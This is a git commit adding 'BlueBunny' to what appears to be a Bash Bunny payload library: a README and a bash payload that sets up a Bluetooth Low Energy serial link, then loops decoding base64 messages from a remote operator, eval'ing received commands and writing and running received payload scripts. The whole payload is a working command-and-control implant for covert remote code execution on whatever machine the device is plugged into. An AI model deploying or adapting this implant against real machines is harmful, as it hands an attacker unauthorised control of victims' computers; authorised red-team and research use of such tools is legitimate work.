Add BlueBunny

Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
2023-10-31 16:47:18 +01:00 · 2023-10-31 16:47:18 +01:00 · 678359b7c7
parent 98bfe07603
commit 678359b7c7
2 changed files with 83 additions and 0 deletions
--- a/payloads/library/remote_access/BlueBunny/README.md
+++ b/payloads/library/remote_access/BlueBunny/README.md
@ -0,0 +1,20 @@
+# BlueBunny
+* Author: 90N45
+* Version: 1.0
+* Category: Remote
+* Attackmodes: NONE (Custom)
+
+### Description
+Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
+Send your Bash Bunny all the instructions it needs on-demand over the air.
+
+### Setup
+This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny)
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Configuring BLE |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 |
+
+*Average runtime: 13 seconds*
--- a/payloads/library/remote_access/BlueBunny/payload.txt
+++ b/payloads/library/remote_access/BlueBunny/payload.txt
@ -0,0 +1,63 @@
+#!/bin/bash
+#
+# Title:         BlueBunny
+# Description:   BLE based C2 server for the Bash Bunny Mark II
+# Author:        90N45
+# Version:       1.0
+# Category:      Remote
+# Attackmodes:   NONE (Custom)
+
+LED SETUP
+
+# Enable serial BLE module
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+
+# Configure BLE module as slave
+echo -n -e "AT+ROLE=0" > /dev/ttyS1
+echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
+echo -n -e "AT+ADV=1" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+
+LED FINISH
+
+while [[ true ]]; do
+	# Get incomming data from serial port
+	data=$(head -1 /dev/ttyS1)
+
+	# Decode base64 encoded data
+	data=$(echo ${data} | base64 -d)
+
+	# Echo data for debugging
+	echo "Debugger: ${data}"
+
+	# Single command
+	if [[ $data =~ "<CMD>" ]]; then
+		# Extract command
+		command=${data#*<CMD>}
+		command=${command%%<CMD>*}
+
+		# Run recieved command
+		eval "${command}"
+	fi
+
+	# Payload file
+	if [[ $data =~ "<PAYLOAD>" ]]; then
+		# Set payload file name
+		file="BlueBunnyPayload-${RANDOM}.txt"
+
+		# Extract file content
+		content=${data#*<PAYLOAD>}
+		content=${content%%<PAYLOAD>*}
+
+		# Write content to file
+		printf "${content}" > "${file}";
+
+		# Run payload
+		bash $file
+
+		# Remove payload file
+		rm $file
+	fi
+done